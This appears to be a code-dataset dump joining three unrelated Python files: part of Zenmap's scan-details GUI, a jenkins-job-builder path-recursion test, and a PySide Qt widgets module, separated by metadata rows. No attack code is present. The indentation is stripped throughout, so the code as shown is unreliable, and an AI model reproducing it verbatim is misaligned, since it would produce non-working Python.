self.command_hbox._pack_noexpand_nofill(self.command_table)
self.command_table.attach(self.command_label,0,1,0,1)
self.command_table.attach(self.info_command_label,1,2,0,1)
self.command_table.attach(self.nmap_version_label,0,1,1,2)
self.command_table.attach(self.info_nmap_version_label,1,2,1,2)
self.command_table.attach(self.verbose_label,0,1,2,3)
self.command_table.attach(self.info_verbose_label,1,2,2,3)
self.command_table.attach(self.debug_label,0,1,3,4)
self.command_table.attach(self.info_debug_label,1,2,3,4)
self.command_expander.add(self.command_hbox)
self._pack_noexpand_nofill(self.command_expander)
self.command_expander.set_expanded(True)
# General info:
self.start_label = HIGEntryLabel(_('Started on:'))
self.info_start_label = HIGEntryLabel(na)
self.finished_label = HIGEntryLabel(_('Finished on:'))
self.info_finished_label = HIGEntryLabel(na)
self.host_up_label = HIGEntryLabel(_('Hosts up:'))
self.info_hosts_up_label = HIGEntryLabel(na)
self.host_down_label = HIGEntryLabel(_('Hosts down:'))
self.info_hosts_down_label = HIGEntryLabel(na)
self.host_scanned_label = HIGEntryLabel(_('Hosts scanned:'))
self.info_hosts_scanned_label = HIGEntryLabel(na)
self.open_label = HIGEntryLabel(_('Open ports:'))
self.info_open_label = HIGEntryLabel(na)
self.filtered_label = HIGEntryLabel(_('Filtered ports:'))
self.info_filtered_label = HIGEntryLabel(na)
self.closed_label = HIGEntryLabel(_('Closed ports:'))
self.info_closed_label = HIGEntryLabel(na)
self.general_expander = gtk.Expander("<b>"+_("General Info")+"</b>")
self.general_expander.set_use_markup(True)
self.general_table = HIGTable()
self.general_table.set_border_width(5)
self.general_table.set_row_spacings(6)
self.general_table.set_col_spacings(6)
self.general_hbox = HIGHBox()
self.general_hbox._pack_noexpand_nofill(hig_box_space_holder())
self.general_hbox._pack_noexpand_nofill(self.general_table)
self.general_table.attach(self.start_label,0,1,0,1)
self.general_table.attach(self.info_start_label,1,2,0,1)
self.general_table.attach(self.finished_label,0,1,1,2)
self.general_table.attach(self.info_finished_label,1,2,1,2)
self.general_table.attach(self.host_up_label,0,1,2,3)
self.general_table.attach(self.info_hosts_up_label,1,2,2,3)
self.general_table.attach(self.host_down_label,0,1,3,4)
self.general_table.attach(self.info_hosts_down_label,1,2,3,4)
self.general_table.attach(self.host_scanned_label,0,1,4,5)
self.general_table.attach(self.info_hosts_scanned_label,1,2,4,5)
self.general_table.attach(self.open_label,0,1,5,6)
self.general_table.attach(self.info_open_label,1,2,5,6)
self.general_table.attach(self.filtered_label,0,1,6,7)
self.general_table.attach(self.info_filtered_label,1,2,6,7)
self.general_table.attach(self.closed_label,0,1,7,8)
self.general_table.attach(self.info_closed_label,1,2,7,8)
self.general_expander.add(self.general_hbox)
self._pack_noexpand_nofill(self.general_expander)
self.general_expander.set_expanded(True)
self._set_from_scan(scan)
def _set_from_scan(self, scan):
"""Initialize the display from a parsed scan."""
# Command info.
self.info_command_label.set_text(scan.get_nmap_command())
self.info_nmap_version_label.set_text(scan.get_scanner_version())
self.info_verbose_label.set_text(scan.get_verbose_level())
self.info_debug_label.set_text(scan.get_debugging_level())
# General info.
self.info_start_label.set_text(scan.get_formatted_date())
self.info_finished_label.set_text(scan.get_formatted_finish_date())
self.info_hosts_up_label.set_text(str(scan.get_hosts_up()))
self.info_hosts_down_label.set_text(str(scan.get_hosts_down()))
self.info_hosts_scanned_label.set_text(str(scan.get_hosts_scanned()))
self.info_open_label.set_text(str(scan.get_open_ports()))
self.info_filtered_label.set_text(str(scan.get_filtered_ports()))
self.info_closed_label.set_text(str(scan.get_closed_ports()))
for scaninfo in scan.get_scaninfo():
exp = gtk.Expander('<b>%s - %s</b>' % (_('Scan Info'), scaninfo['type'].capitalize()))
exp.set_use_markup(True)
display = self.make_scaninfo_display(scaninfo)
exp.add(display)
self._pack_noexpand_nofill(exp)
def make_scaninfo_display(self, scaninfo):
"""Return a widget displaying a scan's "scaninfo" information: type,
protocol, number of scanned ports, and list of services."""
hbox = HIGHBox()
table = HIGTable()
table.set_border_width(5)
table.set_row_spacings(6)
table.set_col_spacings(6)
table.attach(HIGEntryLabel(_('Scan type:')),0,1,0,1)
table.attach(HIGEntryLabel(scaninfo['type']),1,2,0,1)
table.attach(HIGEntryLabel(_('Protocol:')),0,1,1,2)
table.attach(HIGEntryLabel(scaninfo['protocol']),1,2,1,2)
table.attach(HIGEntryLabel(_('# scanned ports:')),0,1,2,3)
table.attach(HIGEntryLabel(scaninfo['numservices']),1,2,2,3)
table.attach(HIGEntryLabel(_('Services:')),0,1,3,4)
table.attach(self.make_services_display(scaninfo['services']),1,2,3,4)
hbox._pack_noexpand_nofill(hig_box_space_holder())
hbox._pack_noexpand_nofill(table)
return hbox
def make_services_display(self, services):
"""Return a widget displaying a list of services like
1-1027,1029-1033,1040,1043,1050,1058-1059,1067-1068,1076,1080"""
combo = gtk.combo_box_new_text()
for i in services.split(","):
combo.append_text(i)
return combo
if __name__ == "__main__":
import sys
from zenmapCore.NmapParser import NmapParser
filename = sys.argv[1]
parsed = NmapParser()
parsed.parse_file(filename)
run_details = ScanRunDetailsPage(parsed)
window = gtk.Window()
window.add(run_details)
window.connect("delete-event", lambda *args: gtk.main_quit())
window.show_all()
gtk.main()
| gpl-2.0 | 135,565,421,673,264,290 | 52.172414 | 98 | 0.598161 | false |
joostvdg/jenkins-job-builder | tests/cmd/test_recurse_path.py | 1 | 4946 | import os
from tests.base import mock
import testtools
from jenkins_jobs import utils
def fake_os_walk(paths):
"""Helper function for mocking os.walk() where must test that manipulation
of the returned dirs variable works as expected
"""
paths_dict = dict(paths)
def os_walk(top, topdown=True):
dirs, nondirs = paths_dict[top]
yield top, dirs, nondirs
for name in dirs:
# hard code use of '/' to ensure the test data can be defined as
# simple strings otherwise tests using this helper will break on
# platforms where os.path.sep is different.
new_path = "/".join([top, name])
for x in os_walk(new_path, topdown):
yield x
return os_walk
# Testing the utils module can sometimes result in the CacheStorage class
# attempting to create the cache directory multiple times as the tests
# are run in parallel. Stub out the CacheStorage to ensure that each
# test can safely create the object without effect.
@mock.patch('jenkins_jobs.builder.CacheStorage', mock.MagicMock)
class CmdRecursePath(testtools.TestCase):
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_pattern(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using pattern
excludes.
testing paths
/jjb_configs/dir1/test1/
/jjb_configs/dir1/file
/jjb_configs/dir2/test2/
/jjb_configs/dir3/bar/
/jjb_configs/test3/bar/
/jjb_configs/test3/baz/
"""
os_walk_paths = [
('/jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('/jjb_configs/dir1', (['test1'], ('file'))),
('/jjb_configs/dir2', (['test2'], ())),
('/jjb_configs/dir3', (['bar'], ())),
('/jjb_configs/dir3/bar', ([], ())),
('/jjb_configs/test3/bar', None),
('/jjb_configs/test3/baz', None)
]
paths = [k for k, v in os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(os_walk_paths)
self.assertEqual(paths, utils.recurse_path('/jjb_configs', ['test*']))
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_absolute(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using absolute
excludes.
testing paths
/jjb_configs/dir1/test1/
/jjb_configs/dir1/file
/jjb_configs/dir2/test2/
/jjb_configs/dir3/bar/
/jjb_configs/test3/bar/
/jjb_configs/test3/baz/
"""
os_walk_paths = [
('/jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('/jjb_configs/dir1', None),
('/jjb_configs/dir2', (['test2'], ())),
('/jjb_configs/dir3', (['bar'], ())),
('/jjb_configs/test3', (['bar', 'baz'], ())),
('/jjb_configs/dir2/test2', ([], ())),
('/jjb_configs/dir3/bar', ([], ())),
('/jjb_configs/test3/bar', ([], ())),
('/jjb_configs/test3/baz', ([], ()))
]
paths = [k for k, v in os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(os_walk_paths)
self.assertEqual(paths, utils.recurse_path('/jjb_configs',
['/jjb_configs/dir1']))
@mock.patch('jenkins_jobs.utils.os.walk')
def test_recursive_path_option_exclude_relative(self, oswalk_mock):
"""
Test paths returned by the recursive processing when using relative
excludes.
testing paths
./jjb_configs/dir1/test/
./jjb_configs/dir1/file
./jjb_configs/dir2/test/
./jjb_configs/dir3/bar/
./jjb_configs/test3/bar/
./jjb_configs/test3/baz/
"""
os_walk_paths = [
('jjb_configs', (['dir1', 'dir2', 'dir3', 'test3'], ())),
('jjb_configs/dir1', (['test'], ('file'))),
('jjb_configs/dir2', (['test2'], ())),
('jjb_configs/dir3', (['bar'], ())),
('jjb_configs/test3', (['bar', 'baz'], ())),
('jjb_configs/dir1/test', ([], ())),
('jjb_configs/dir2/test2', ([], ())),
('jjb_configs/dir3/bar', ([], ())),
('jjb_configs/test3/bar', None),
('jjb_configs/test3/baz', ([], ()))
]
rel_os_walk_paths = [
(os.path.abspath(
os.path.join(os.path.curdir, k)), v) for k, v in os_walk_paths]
paths = [k for k, v in rel_os_walk_paths if v is not None]
oswalk_mock.side_effect = fake_os_walk(rel_os_walk_paths)
self.assertEqual(paths, utils.recurse_path('jjb_configs',
['jjb_configs/test3/bar']))
| apache-2.0 | -2,137,185,602,599,578,600 | 35.367647 | 79 | 0.531945 | false |
davidsoncolin/IMS | UI/QCore.py | 1 | 53288 | #!/usr/bin/env python
import functools
import numpy as np
from PySide import QtCore, QtGui
from GCore import State
from UI import createAction
import weakref
class QListWidget(QtGui.QListView):
item_selected = QtCore.Signal(int)
focus_changed = QtCore.Signal(bool)
item_renamed = QtCore.Signal(str, str)
data_changed = QtCore.Signal(dict)
def __init__(self, items=[], parent=None, renameEnabled=False):
super(QListWidget, self).__init__(parent)
self.item_count = 0
self.renameEnabled = renameEnabled
self.overrideSelection = None
self.selectedItem = None
self.item_list_model = None
self.item_selection_model = None
self.setDragEnabled(True)
self.setDragDropOverwriteMode(False)
self.setDragDropMode(QtGui.QAbstractItemView.InternalMove)
self.createWidgets()
for item in items:
self.addItem(item)
def count(self):
return self.item_count
def createWidgets(self):
self.item_list_model = QtGui.QStandardItemModel(self)
self.item_list_model.setSortRole(QtCore.Qt.DisplayRole)
self.item_list_model.dataChanged.connect(self.handleDataChange)
self.setModel(self.item_list_model)
self.item_selection_model = self.selectionModel()
self.item_selection_model.selectionChanged.connect(self.handleItemSelect)
self.setMinimumHeight(60)
self.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred))
def handleDataChange(self, *args):
print ("Data Change: {}".format(args))
self.overrideSelection = args[0].row()
newText = self.getItem(args[0].row(), QtCore.Qt.DisplayRole)
if newText != self.selectedItem:
self.item_renamed.emit(self.selectedItem, newText)
self.selectedItem = newText
else:
self.data_changed.emit({})
def focusInEvent(self, *args):
self.focus_changed.emit(True)
def focusOutEvent(self, *args):
self.focus_changed.emit(False)
def handleItemSelect(self, *args):
if self.overrideSelection is not None:
self.setUserSelection(self.overrideSelection)
self.overrideSelection = None
return
try:
self.selectedItem = self.getItem(self.getSelection(), QtCore.Qt.DisplayRole)
print ("Selected: {}".format(self.selectedItem))
self.item_selected.emit(self.getSelection())
except AttributeError:
pass
def getSelection(self):
try:
selection = self.item_selection_model.selection().indexes()[0].row()
except IndexError:
selection = -1
return selection
def removeItem(self, index):
self.item_list_model.takeRow(index)
self.item_count -= 1
def clear(self):
while self.item_count:
self.removeItem(0)
def addItem(self, mitem, data='', index=None):
item = QtGui.QStandardItem()
item.setData(mitem, QtCore.Qt.DisplayRole)
item.setData(data, QtCore.Qt.UserRole)
item.setEditable(self.renameEnabled)
item.setDropEnabled(False)
# Can be used to store data linked to the name
# item.setData(customData, QtCore.Qt.UserRole)
if index is None:
self.item_list_model.appendRow(item)
else:
self.item_list_model.insertRow(index, item)
self.item_count += 1
def addItems(self, items):
for item in items:
self.addItem(item)
def setUserSelection(self, index):
if self.item_count > 0:
self.setCurrentIndex(self.item_list_model.item(index).index())
self.selectedItem = self.getItem(index, QtCore.Qt.DisplayRole)
def getItems(self, role=None):
if role is None:
return [self.item_list_model.item(i) for i in xrange(0, self.item_count)]
else:
return [self.item_list_model.item(i).data(role) for i in xrange(0, self.item_count)]
def getItem(self, index, role=None):
if role is None:
return self.item_list_model.item(index)
else:
return self.item_list_model.item(index).data(role)
class QNodeWidget(QListWidget):
def __init__(self, parent):
super(QNodeWidget, self).__init__(parent=parent)
self.cookFrom = -1
self.connect(self, QtCore.SIGNAL("doubleClicked(QModelIndex)"), self, QtCore.SLOT("ItemDoubleClicked(QModelIndex)"))
def addItem(self, mitem, data='', index=None):
super(QNodeWidget, self).addItem(mitem, data, index)
def getNodes(self):
items = self.getItems(QtCore.Qt.DisplayRole)
if self.cookFrom == -1: return items
evaluate = items[:self.cookFrom + 1]
return evaluate
def ItemDoubleClicked(self, index):
self.changeCookIndex(self.getSelection(), False)
def changeCookIndex(self, index, allowDeselect=False, flush=True):
selectedItem = self.getItem(index)
if index == self.cookFrom and allowDeselect:
self.cookFrom = -1
selectedItem.setBackground(QtGui.QColor(255, 255, 255))
else:
prevCookIndex = self.cookFrom
self.cookFrom = index
if prevCookIndex != -1:
self.getItem(prevCookIndex).setBackground(QtGui.QColor(255, 255, 255))
selectedItem.setBackground(QtGui.QColor(50, 0, 180, 150))
self.data_changed.emit({'flush': flush})
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_P:
self.changeCookIndex(self.getSelection())
class QOrderedListWidget(QtGui.QGroupBox):
''' A list widget where the order of items is important and can be
changed by the user '''
item_edit = QtCore.Signal(int, list)
def __init__(self, items=[], parent=None):
super(QOrderedListWidget, self).__init__(parent)
self.item_count = 0
self.createWidgets()
self.createMenus()
self.setTitle("Items")
for item in items:
self.addItem(item)
def createWidgets(self):
self._itemList = QtGui.QListView(self)
self.item_list_model = QtGui.QStandardItemModel(self)
self.item_list_model.setSortRole(QtCore.Qt.UserRole + 1)
self._itemList.setModel(self.item_list_model)
self.item_list_model.dataChanged.connect(self.handleDataChange)
plsm = self._itemList.selectionModel()
plsm.selectionChanged.connect(self._handleItemSelect)
self._itemList.setMinimumHeight(60)
self.toolBar = QtGui.QToolBar(self)
self.toolBar.setOrientation(QtCore.Qt.Vertical)
self._itemList.setSizePolicy(QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)) # .MinimumExpanding))
layout = QtGui.QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
layout.addWidget(self._itemList)
layout.addWidget(self.toolBar)
self.setLayout(layout)
def move(self, di=1):
""" move the selected item up (di=-1) or down (di=1). Updates the model(ui) and the
ik item order """
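		# e.g. self.move(-1) swaps the selected row with the one above it,
		# self.move(1) with the one below (illustrative).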
sm = self._itemList.selectionModel()
try:
selectedIndex = sm.selection().indexes()[0]
except IndexError: # nothing selected at all
return
order = selectedIndex.data(QtCore.Qt.UserRole + 1)
# if it will be moved out of list bounds then skip
if (order + di) < 0 or (order + di) >= self.item_count: return
# swap the two items in the list model.
self.item_list_model.item(order).setData(order + di, QtCore.Qt.UserRole + 1)
self.item_list_model.item(order + di).setData(order, QtCore.Qt.UserRole + 1)
# re-sort and notify
self.item_list_model.sort(0)
try:
selection = sm.selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def handleDataChange(self):
pass
def _handleItemSelect(self, selected, deselected):
try:
selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def setUserSelection(self, index):
if self.item_count > 0: self._itemList.setCurrentIndex(self.item_list_model.item(index).index())
def createMenus(self):
# http://standards.freedesktop.org/icon-naming-spec/icon-naming-spec-latest.html
up = createAction('Up', self, [functools.partial(self.move, -1)], 'Move item up', icon=QtGui.QIcon.fromTheme("go-up"))
down = createAction('Down', self, [functools.partial(self.move, 1)], 'Move item down', icon=QtGui.QIcon.fromTheme("go-down"))
remove = createAction('Remove', self, [functools.partial(self.removeItem)], 'Remove item', icon=QtGui.QIcon.fromTheme("edit-delete"))
self.toolBar.addAction(up)
self.toolBar.addAction(down)
self.toolBar.addAction(remove)
def removeItem(self):
sm = self._itemList.selectionModel()
try:
selected_item = sm.selection().indexes()[0]
except IndexError: # nothing selected at all
return
selected_index = selected_item.data(QtCore.Qt.UserRole + 1)
removed_row = self.item_list_model.takeRow(selected_index)
self.item_count = self.item_count - 1
for i in xrange(selected_index, self.item_count):
self.item_list_model.item(i).setData(i, QtCore.Qt.UserRole + 1)
# re-sort and notify
self.item_list_model.sort(0)
try:
selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def addItem(self, mitem, ignore=False):
item = QtGui.QStandardItem()
item.setData(mitem, QtCore.Qt.DisplayRole)
# Can be used to store data linked to the name
# item.setData(customData, QtCore.Qt.UserRole)
item.setData(self.item_count, QtCore.Qt.UserRole + 1)
self.item_list_model.appendRow(item)
self.item_count = self.item_count + 1
if not ignore:
try:
selection = self._itemList.selectionModel().selection().indexes()[0]
except IndexError:
selection = -1
self.item_edit.emit(selection, self.getItems())
def getItems(self):
return [self.item_list_model.item(i).data(QtCore.Qt.DisplayRole) for i in xrange(0, self.item_count)]
class Qselect(QtGui.QComboBox):
'''Qselect is like a QComboBox, but has correct mouse wheel behaviour (only responds to wheel when it has focus).'''
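	# Illustrative usage sketch (callback name is hypothetical):
	#   sel = Qselect(options=['low', 'high'], default='high', cb=on_change)
	#   where on_change(widget, index) receives this widget and the newly selected index.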
def __init__(self, parent=None, options=None, default=None, cb=None):
QtGui.QComboBox.__init__(self, parent)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
if options != None:
for item in options: self.addItem(item)
if default != None:
self.setCurrentIndex(options.index(default))
self.cb = cb
self.connect(self, QtCore.SIGNAL('currentIndexChanged(int)'), self.callback)
def callback(self, val):
if self.cb != None: self.cb(self, val)
def wheelEvent(self, e):
if self.hasFocus():
QtGui.QComboBox.wheelEvent(self, e)
else:
e.ignore()
def focusInEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.WheelFocus)
QtGui.QComboBox.focusInEvent(self, e)
def focusOutEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.StrongFocus)
QtGui.QComboBox.focusOutEvent(self, e)
class Qslide(QtGui.QSlider):
'''Qslide is like a QSlider, but has correct mouse wheel behaviour (only responds to wheel when it has focus).'''
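	# Otherwise behaves like a normal QSlider, e.g. (illustrative):
	#   s = Qslide(QtCore.Qt.Horizontal); s.setRange(0, 100); s.setValue(50)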
def __init__(self, orient, parent=None):
QtGui.QSlider.__init__(self, orient, parent)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
def wheelEvent(self, e):
if self.hasFocus():
QtGui.QSlider.wheelEvent(self, e)
else:
e.ignore()
def focusInEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.WheelFocus)
QtGui.QSlider.focusInEvent(self, e)
def focusOutEvent(self, e):
e.accept()
self.setFocusPolicy(QtCore.Qt.StrongFocus)
QtGui.QSlider.focusOutEvent(self, e)
class QslideLimitControl(QtGui.QGroupBox):
''' A control that contains a slider and a textbox useful for easy embedding in an app '''
# TODO handle scrollwheel and keyboard behaviour better, currently it scrolls by the slider units
# which can be very small
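	# Illustrative usage sketch (handler name is hypothetical):
	#   ctrl = QslideLimitControl(0.0, 10.0)
	#   ctrl.value_changed.connect(on_value)  # called with the new float value
	#   ctrl.sync(5.0)                        # update the GUI without firing the callback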
value_changed = QtCore.Signal(float)
def __init__(self, loval=0, hival=100, parent=None):
QtGui.QGroupBox.__init__(self, parent)
self.parent = parent
self.limits = [loval, hival]
self.digits = 2
self.valueIsAdjusting = False
self.createWidgets(loval, hival)
self.createLayout()
self.setStyleSheet("border:0;")
def createWidgets(self, loval, hival):
self.slider = Qslide(QtCore.Qt.Horizontal, self.parent)
self.value = loval
self.slider.unit = 1e-4
self.slider.setRange(min(max(-1e9, round(self.value / self.slider.unit)), 1e9), min(max(-1e9, round(hival / self.slider.unit)), 1e9))
self.slider.setValue(round(loval / self.slider.unit))
self.slider.valueChanged[int].connect(self.sliderSet)
self.display = QtGui.QLineEdit()
# self.display.setFont(QtGui.QFont('size=8em'))
self.display.setMaxLength(10)
unit = 1.0 # float(np.radians(1.0)) ### TODO
self.display.unit = unit
self.setDisplayText(self.value / unit)
self.display.editingFinished.connect(self.displaySet) # this folds the values of self and di into the callback
def createLayout(self):
layout = QtGui.QGridLayout()
layout.setColumnStretch(0, 5)
layout.setColumnStretch(1, 2)
layout.addWidget(self.slider)
layout.addWidget(self.display)
self.setLayout(layout)
def sync(self, value):
'''Update the gui to match the value; don't invoke the callback.'''
self.value = value
block = self.slider.blockSignals(True) # temporarily avoid callbacks
self.slider.setValue(round(value / self.slider.unit))
self.slider.blockSignals(block)
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
# ought to update the lo/hi text boxes too?
def setValue(self, x, unit):
'''Set the value: clamp and run the callback. Don't update the gui.'''
self.value = x * unit
mn, mx = self.limits
self.value = max(mn, self.value)
self.value = min(mx, self.value)
self.value_changed.emit(self.value)
return self.value
def setLo(self, value):
self.limits[0] = value
self.slider.setMinimum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify hi and value...
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.limits[1] = self.slider.maximum() * self.slider.unit / self.display.unit
return value
def setHi(self, value):
self.limits[1] = value
self.slider.setMaximum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify lo and value...
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.limits[0] = self.slider.minimum() * self.slider.unit / self.display.unit
return value
def sliderSet(self, x):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
self.setValue(self.slider.value(), self.slider.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.setDisplayText(self.value / self.display.unit)
except:
pass
self.valueIsAdjusting = False
def displaySet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.display.text())
self.setValue(v, self.display.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.setDisplayText(self.value / self.display.unit)
except:
self.setDisplayText(self.slider.value() * self.slider.unit / self.display.unit)
self.valueIsAdjusting = False
def setDisplayText(self, value):
self.display.setText(str(round(value, self.digits)))
# POTENTIALLY DEPRECATED
class QslideLimitValue(QtGui.QGridLayout):
'''An object that wraps the layout and gui elements for a floating point value control with limits.'''
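	# Illustrative construction (cb/cbActor names are hypothetical):
	#   row = QslideLimitValue('tx', 0.0, -10.0, 10.0, cb=on_set, cbActor=actor)
	#   cb is invoked as cb(cbActor, name, value) whenever the value changes.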
def __init__(self, name, value, loval, hival, cb, cbActor, parent=None):
QtGui.QGridLayout.__init__(self)
self.setColumnStretch(0, 1)
self.setColumnStretch(1, 5)
self.setColumnStretch(2, 2)
self.setColumnStretch(3, 1)
self.setColumnStretch(4, 1)
self.slider = Qslide(QtCore.Qt.Horizontal, parent)
self.value = value
self.slider.unit = 1e-4
self.slider.setRange(min(max(-1e9, round(loval / self.slider.unit)), 1e9), min(max(-1e9, round(hival / self.slider.unit)), 1e9))
self.slider.setValue(round(value / self.slider.unit))
self.slider.valueChanged[int].connect(self.sliderSet)
self.display = QtGui.QLineEdit()
# self.display.setFont(QtGui.QFont('size=8em'))
self.display.setMaxLength(10)
unit = 1.0 # float(np.radians(1.0)) ### TODO
self.display.unit = unit
self.display.setText(str(value / unit))
self.display.editingFinished.connect(self.displaySet) # this folds the values of self and di into the callback
self.limits = [loval, hival]
self.lo = QtGui.QLineEdit()
self.lo.setMaxLength(10)
self.lo.unit = unit
self.lo.setText(str(loval / unit))
self.lo.editingFinished.connect(self.loSet) # this folds the values of self and di into the callback
self.hi = QtGui.QLineEdit()
self.hi.setMaxLength(10)
self.hi.unit = unit
self.hi.setText(str(hival / unit))
self.hi.editingFinished.connect(self.hiSet) # this folds the values of self and di into the callback
self.name = name
self.label = QtGui.QLabel('<font size=8em>%s</font>' % name)
self.addWidget(self.label)
self.addWidget(self.slider)
self.addWidget(self.display)
self.addWidget(self.lo)
self.addWidget(self.hi)
self.cb = cb
self.cbActor = cbActor
self.valueIsAdjusting = False
def sync(self, value):
'''Update the gui to match the value; don't invoke the callback.'''
self.value = value
block = self.slider.blockSignals(True) # temporarily avoid callbacks
self.slider.setValue(round(value / self.slider.unit))
self.slider.blockSignals(block)
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
# ought to update the lo/hi text boxes too?
def setValue(self, x, unit):
'''Set the value: clamp and run the callback. Don't update the gui.'''
self.value = x * unit
mn, mx = self.limits
self.value = max(mn, self.value)
self.value = min(mx, self.value)
print ("setValue")
self.cb(self.cbActor, self.name, self.value)
return self.value
def setLo(self, x, unit):
# do validation
value = float(x) * unit
self.limits[0] = value
self.slider.setMinimum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify hi and value...
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.hi.setText(str(self.slider.maximum() * self.slider.unit / self.hi.unit))
self.limits[1] = self.slider.maximum() * self.slider.unit / self.hi.unit
return value
def setHi(self, x, unit):
# do validation
value = float(x) * unit
self.limits[1] = value
self.slider.setMaximum(min(max(-1e9, round(value / self.slider.unit)), 1e9)) # actually, this might modify lo and value...
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.lo.setText(str(self.slider.minimum() * self.slider.unit / self.lo.unit))
self.limits[0] = self.slider.minimum() * self.slider.unit / self.lo.unit
return value
def sliderSet(self, x):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
self.setValue(self.slider.value(), self.slider.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.display.setText(str(self.value / self.display.unit))
except:
pass
self.valueIsAdjusting = False
def displaySet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.display.text())
self.setValue(v, self.display.unit)
self.slider.setValue(round(self.value / self.slider.unit))
self.display.setText(str(self.value / self.display.unit))
except:
self.display.setText(str(self.slider.value() * self.slider.unit / self.display.unit))
self.valueIsAdjusting = False
def loSet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.lo.text())
value = self.setLo(v, self.lo.unit)
self.lo.setText(str(value / self.lo.unit))
except:
self.lo.setText(str(self.limits[0] / self.lo.unit))
self.valueIsAdjusting = False
def hiSet(self):
if self.valueIsAdjusting: return
self.valueIsAdjusting = True
try:
v = float(self.hi.text())
value = self.setHi(self.hi.text(), self.hi.unit)
self.hi.setText(str(value / self.hi.unit))
except:
self.hi.setText(str(self.limits[1] / self.hi.unit))
self.valueIsAdjusting = False
class QintWidget(QtGui.QLineEdit):
	''' Draggable spin box. Ctrl + a left, middle or right mouse button drag scrubs the value
	by progressively larger steps (minstep x1, x100 or x10000 respectively)
'''
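	# Illustrative usage sketch (handler name is hypothetical):
	#   w = QintWidget(); w.setRange(0, 255); w.setValue(128)
	#   w.valueChanged.connect(on_int_changed)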
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QintWidget, self).__init__(parent)
# self.setDecimals(4)
# self.setButtonSymbols(QtGui.QAbstractSpinBox.NoButtons)
# self.setKeyboardTracking(False) # don't emit 3 times when typing 100
self.minstep = 1
self._dragging = False
self.current_value = None
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu) # no copy/paste menu to interfere with dragging
# catch the mouse events from the lineedit that is a child of the spinbox
# editor = self.findChild(QtGui.QLineEdit)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
# Add a Validator
int_validator = intValidator(self)
self.setValidator(int_validator)
self.setRange()
def handleEditingFinished(self):
self.setValue(self.text())
def setValue(self, v):
v = int(v) # ensure it's an int!
if self.current_value == v: return
self.current_value = v
self.setText(str(v))
# if not self._dragging:
self.valueChanged.emit(v)
# Constrains the spin box to between two values
def setRange(self, min=None, max=None):
try:
self.validator().setRange(min,max)
# print "Valid from {} to {}".format(str(self.validator().bottom()), str(self.validator().top()))
except:
print ("Inputs to QintWidget.setRange() are invalid with values {} and {}".format(min, max))
# Allows the box to be locked or unlocked
# Defaults to true so foo.setLocked() would lock "foo"
def setLocked(self, status=True):
assert isinstance(status, bool), "Lock value is not a boolean"
self.setReadOnly(status)
def value(self):
return int(self.text())
def text(self):
ret = super(QintWidget, self).text()
return ret
def eventFilter(self, obj, event):
if event.type() == QtGui.QMouseEvent.MouseButtonPress:
if not event.modifiers() & QtCore.Qt.ControlModifier:
return False
self.gpx, self.gpy = event.globalX(), event.globalY()
self.startX, self.startY = event.x(), event.y()
if event.button() & QtCore.Qt.LeftButton:
self._dragging = self.minstep
if event.button() & QtCore.Qt.MiddleButton:
self._dragging = self.minstep * 100
if event.button() & QtCore.Qt.RightButton:
self._dragging = self.minstep * 10000
return True
elif event.type() == QtGui.QMouseEvent.MouseButtonRelease:
if self._dragging is not False:
self._dragging = False
self.setValue(self.text())
else:
self._dragging = False
return True
elif event.type() == QtGui.QMouseEvent.MouseMove:
if self._dragging:
if not self.isReadOnly():
newValue = (self.value() + (event.x() - self.startX) * self._dragging)
if self.validator().bottom() is not None or self.validator().top() is not None:
newValue = np.clip(newValue, self.validator().bottom(), self.validator().top())
self.setValue(newValue)
QtGui.QCursor.setPos(self.gpx, self.gpy)
return True
return False
class QLineWidget(QtGui.QLineEdit):
valueChanged = QtCore.Signal(list)
def __init__(self, parent=None):
super(QLineWidget, self).__init__(parent)
self._dragging = False
self.current_value = None
self.setContextMenuPolicy(QtCore.Qt.PreventContextMenu)
self.installEventFilter(self)
self.editingFinished.connect(functools.partial(self.handleEditingFinished))
def handleEditingFinished(self):
self.setValue(self.text())
